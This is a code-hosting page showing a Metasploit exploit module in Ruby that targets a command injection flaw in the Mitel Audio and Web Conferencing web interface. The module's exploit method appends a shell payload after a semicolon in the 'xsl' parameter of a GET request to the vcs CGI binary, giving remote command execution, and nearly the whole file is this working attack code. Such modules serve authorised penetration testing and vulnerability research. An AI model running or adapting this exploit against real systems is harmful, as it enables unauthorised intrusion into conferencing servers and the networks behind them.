FilesExpand file tree

 master

/

16910.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

84 lines (72 loc) · 2.13 KB

 master

/

16910.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

84 lines (72 loc) · 2.13 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

##

# $Id: mitel_awc_exec.rb 11516 2011-01-08 01:13:26Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Mitel Audio and Web Conferencing Command Injection',

'Description' => %q{

This module exploits a command injection flaw within the Mitel

Audio and Web Conferencing web interface.

},

'Author' => [ 'hdm' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 11516 $',

'References' =>

[

['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],

['OSVDB', '69934'],

# ['CVE', ''],

# ['BID', '']

],

'Platform' => ['unix', 'linux'],

'Arch' => ARCH_CMD,

'Privileged' => false,

'Payload' =>

{

'DisableNops' => true,

'Space' => 1024,

'BadChars' => "<>",

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl ruby bash telnet',

}

},

'Targets' => [ ['Automatic', { }], ],

'DefaultTarget' => 0,

'DisclosureDate' => 'Dec 12 2010'

))

register_options(

[

Opt::RPORT(80),

OptString.new('URIPATH', [ true, "The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs" ])

], self.class)

end

def exploit

print_status("Attempting to execute our command..")

res = send_request_cgi(

{

'uri' => datastore['URIPATH'],

'method' => 'GET',

'vars_get' => {

'xml' => 'withXsl',

'xsl' => ';' + payload.encoded

}

}, 10)

if res and res.code.to_i > 200

print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")

return

end

handler

end

end